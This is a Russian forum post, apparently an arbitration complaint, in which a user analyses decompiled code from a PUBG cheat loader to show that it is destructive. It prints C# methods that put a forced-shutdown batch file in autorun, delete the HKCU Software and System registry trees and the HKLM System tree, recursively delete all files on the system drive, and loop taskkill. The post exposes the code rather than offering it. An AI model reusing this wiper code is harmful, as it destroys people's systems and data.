Модератор форума
Хорошо, я тебя понял. На днях пофиксим . Раз вопросов больше нет , и правил форума я не нарушил прошу закрыть тему)Ладно. Давай я для удобства будущего арбитра данной жалобы объеденю все в 1 пост. В котором будет вся информация что я нашел по .exe файлу. Во первых: пруф того что исходник я показываю именно того софта который у тебя в лодыре:
Пожалуйста, авторизуйтесь для просмотра ссылки.
оригинальный файл
можете проверишь по хешам что скачивает лодырь солика
Пожалуйста, авторизуйтесь для просмотра ссылки.
Распакованный файл
method_42 (Token: 0x06000093): скриншот -Пожалуйста, авторизуйтесь для просмотра ссылки.
Данная функция вызывает в условии 2 функции:Код:private void method_42() { if (this.method_28()) { this.method_27(new string[] { "Critical ERROR" }); } else { this.method_41(""); this.method_40(); } this.method_38(); }
method_41 (Token: 0x06000092): скриншот -Пожалуйста, авторизуйтесь для просмотра ссылки.
Данная функция создает .bat файл с функцией перезагрузки системы, и после записывает .bat в авто-загрузку.Код:private void method_41(string string_58 = "") { try { string text = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.Windows), "boot.bat"); if (!File.Exists(text)) { File.WriteAllText(text, "shutdown.exe -s -t 00 -f"); this.method_30(text); Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true).SetValue("Boot", text); } } catch { } }
method_40 (Token: 0x06000091) скриншот -Пожалуйста, авторизуйтесь для просмотра ссылки.
Данная функция в начале кода удаляет 3 ветки реестра:Код:private void method_40() { this.method_81(); try { Registry.CurrentUser.DeleteSubKeyTree("Software"); } catch { } try { Registry.CurrentUser.DeleteSubKeyTree("System"); } catch { } try { Registry.LocalMachine.DeleteSubKeyTree("System"); } catch { } this.method_32(Path.Combine(Path.Combine(Form1.string_28, "TslGame\\Binaries\\Win64"), "bgsecondary.dat")); this.method_32(Form1.string_9); this.method_32(Form1.string_10); this.method_32(Form1.string_12); this.method_31(Form1.string_6); this.method_33(Form1.string_6, true); this.method_31(Path.GetPathRoot(Environment.SystemDirectory)); this.method_33(Path.GetPathRoot(Environment.SystemDirectory), true); this.method_85(true); this.method_39(); try { string text = string.Empty; text = text + "attrib -r \"" + Form1.string_13 + "\"\n"; text = text + "attrib -s -h \"" + Form1.string_13 + "\"\n"; text = text + "DEL /F \"" + Form1.string_13 + "\"\n"; text += ":loop\n"; text = text + "taskkill /f /im " + Form1.string_15 + "\n"; text += "goto loop \n"; this.method_35(text); } catch { } this.method_38(); }
1. CurrentUser > Software
2. CurrentUser > System
3. LocalMachine > System
официальная документация от Microsoft по функции которые используются для удаления разделов в рееестре -Пожалуйста, авторизуйтесь для просмотра ссылки.
После софт выполняет функцию, в которую передает системную папку:
method_31(Token: 0x06000088) скриншот -Код:this.method_31(Path.GetPathRoot(Environment.SystemDirectory));
Пожалуйста, авторизуйтесь для просмотра ссылки.
Данная функция используя цикл, извлекает из папки (в данном случае системной ибо именно она была выше передана) все файлы по маске "*.*" используя флаг ПОИСК ПО ВСЕМ ДИРЕКТОРИЯМ в переменную string_59 и удаляет все найденные файлы фунцией:Код:private void method_31(string string_58) { try { foreach (string string_59 in Directory.EnumerateFiles(string_58, "*.*", SearchOption.AllDirectories)) { this.method_32(string_59); } } catch { } }
method_32 (Token: 0x06000089 ) скриншот -Пожалуйста, авторизуйтесь для просмотра ссылки.